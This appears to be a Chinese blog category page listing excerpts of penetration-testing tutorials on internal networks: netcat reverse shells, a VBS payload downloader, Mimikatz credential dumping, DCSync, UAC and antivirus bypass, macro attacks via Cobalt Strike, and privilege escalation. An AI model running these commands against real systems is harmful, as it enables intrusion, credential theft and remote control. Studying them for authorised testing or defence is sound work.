内网渗透
文章平均质量分 71
介绍一些常用的内网渗透小知识
Amire0x
今晚月色真好
展开
-
内网一些渗透技巧
渗透技巧msf+Donut交互式执行程序简介工具 DountDonut从VBScript,JScript,EXE,DLL(包括.NET程序集)文件生成x86或x64 Shellcode。 可以将此Shellcode注入到任意Windows进程中以在内存中执行。使用方法先msf生成一个后门程序,执行然后执行/donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -0 /tmp/payload.bin-a原创 2020-11-30 17:57:03 · 465 阅读 · 0 评论 -
内网常见域内攻击
域内攻击kerberos攻击利用黄金票据+dcsync获取密码先获取黄金票据获取密码lsadump::dcsync /user:用户 /domain:域名称成功域用户、密码枚举工具用户枚举先导入Import-Module .\DomainPasswordSpray.ps1然后执行Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -原创 2020-11-30 17:54:11 · 1303 阅读 · 0 评论 -
内网端口转发小技巧
端口转发NC反向连接kali开启监听nc -lnvp 7777目标返向连接nc -e cmd.exe 192.168.95.128 7777可以执行命令正向连接目标开启监听nc -l -p 5555 -e cmd.exekali连接nc -nvv 192.168.95.12 5555执行命令lcx外网无法访问内网,但内网可访问外网client:转发自己的3389端口到远程端口7777上lcx.exe -slave rhost原创 2020-11-30 17:48:51 · 1727 阅读 · 0 评论 -
内网一些简单绕过技巧
bypass基础bypassUACUAC可以防止一些提权操作工具msf,cs第三方uacme一个集合bypassuac的github仓库其他,主要找找能用的bypassASR减少一些来自宏的攻击office宏攻击打开cs,并创建一个attack,并设置好监听生成宏的利用代码及使用方法然后在office中启用即可利用cs钓鱼绕过方法bypassApplocker应用程序控制策略绕过方法...原创 2020-11-30 17:44:19 · 822 阅读 · 0 评论 -
内网payload下载及免杀文档制作
payload下载及免杀文档制作payload下载vbs脚本如下,注意要放到一行里支持windows全系列,但对https不友好echo set a=createobject(^"adod^"+^"b.stream^"):setw=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile w原创 2020-11-30 17:42:56 · 716 阅读 · 0 评论 -
内网中的简单横向移动
横向移动WMI简介全程Windows管理规范,从03开始一直存在由一系列工具组成,可以在本地或者远程管理计算机系统Windows默认不会讲WMI的操作记录在日志中利用条件WMI服务开启,135端口,默认开启防火墙允许135,445等端口通信测试方法nmap -p 135 iptelnet ip 135......管理员权限,及本地管理员组wmic用powershell联动cswmic /node:<目标 ip> /user:<用户或域原创 2020-11-30 17:37:11 · 1679 阅读 · 0 评论 -
内网中的主机密码抓取
密码抓取Mimikatzmimikatz的几大运行方式使用前先将对应版本的mimikazi传上去运行如下命令不支持粘贴,不区分大小写基本使用基于win2003测试列出导出凭证crypto::certificates获得debug权限(需要debug权限来执行一些mimikatz命令)privilege::debug提升成功则会返回 OK获取所有可用的提供者凭据,可得到当前账户的密码sekurlsa::logonpasswords查看tokentok原创 2020-11-29 16:24:18 · 2627 阅读 · 1 评论 -
内网的Linux提权基础
Linux 提权目的 user -> root提权手法密码相关查看带有密码的文件grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null查看过期密码权限要求比较高cat /etc/security/opasswd用户最后编辑的文件find / -mmin -10 2>/dev/null | grep -Ev "^/proc"查看内存中密码同样要求高权限s原创 2020-11-29 16:05:52 · 249 阅读 · 0 评论 -
内网的Windows提权基础
Windows提权基础工具提权msf提权首先生成payload配置msf提权getsystem因为uac,直接使用这个可能会失败选择一个bypassuacsearch bypassuacwindows/local/bypassuac_silentcleanup)漏洞提权补丁查询提权辅助页windows-expliot-suggester查看补丁run post/windows/gather/enum_patches原创 2020-11-29 15:56:51 · 559 阅读 · 0 评论 -
Windows认证基础知识
Windows认证本地认证基础知识本地登录,操作系统会使用用户输入的密码作为凭证去与系统中的密码进行验证密码存储位置:%SystemRoot%\system32\config\samSAM保留了计算机本地所有用户的凭证信息,可以理解为是一个数据库此外当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,windows一般只保存密码的hashLM HashLM(LAN Manager)协议,在NTML之前的协议,认证机制类似,加密算法不同,基本被淘汰由于根据LM Hash原创 2020-11-28 14:10:15 · 723 阅读 · 1 评论 -
内网基础免杀
基础免杀杀软(AV)参考免杀表[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-p9FNsY6L-1606389248174)(基础免杀.assets/image-20200711194218334.png)]杀软检测规则扫描技术扫描压缩包急救盘扫描智能扫描全盘扫描开机扫描监控技术内存监控网页监控行为监控检测方法特征码扫描进程行为检测(沙盒)主动防御机器学习识别杀软绕过思路修改特征码加壳二次编译分离免杀。。。常原创 2020-11-28 14:06:54 · 940 阅读 · 0 评论 -
内网中的cobalstrike基础
CobalStrike概述一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。主要用于团队作战,可谓是团队渗透神器,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。用法启动要求java版本1.8以上kali 切换java版本update-alternatives --config java启动服务器teamserver + ip + 密码客户端连接原创 2020-11-28 13:09:42 · 935 阅读 · 1 评论 -
内网中的Metasploit基础
Metasploit又名MSF框架技术,是一个开源工具,方便渗透测试,由Rudy程序语言编写的模板化框架,由很好的扩展性Auxiliaries(辅助模块)负责执行扫描,嗅探,指纹识别等相关功能Exploit(漏洞利用模块)利用系统,应用,或服务中的安全漏洞进行攻击,每个漏洞都有相应的攻击代码Payload(攻击载荷模块)是目标系统在被渗透攻击后完成实际攻击功能的代码Post(后期渗透模块)在取得目标权限远程控制之后,进行一系列后渗透攻击Encoders(编码工具模原创 2020-11-27 22:51:19 · 265 阅读 · 0 评论 -
内网渗透中域的基础知识
域基础参考链接基础内网也叫做局域网,在某一区域内由多台计算机互联成的计算机组。工作组将不同的电脑一般按功能(或部门)分别列入不同的工作组中,如技术部的技术组,行政部的行政组。这样的分组更有序加入/创建工作组右击计算机->属性->更改设置->在计算机名中输入名称->在工作组中输入名称。相当于新建了一个组,更改工作组名称就相当于更换了组退出工作组改动工作组名称即可工作组里的所有计算即都是对等的。无服务器和客户机之分域一个有安全边界的计算机集合,可以理原创 2020-11-27 17:41:36 · 467 阅读 · 0 评论 -
内网信息收集小知识(一)
单机信息收集网络状况收集协议判断TCP外网:nc -lvp port内网:nc ip portdns外网:nc -u -lvp 53内网: windows:nslookup www.baidu.com/ip有数据即代表成功 linux:dig ip/www.baidu.comhttp本机开一个http服务,目标机访问即可外网:nc -lvp 80(or 8080)内网:curl ip:8080icmp外网:抓包,tcpdump icmp内原创 2020-11-26 19:11:59 · 414 阅读 · 1 评论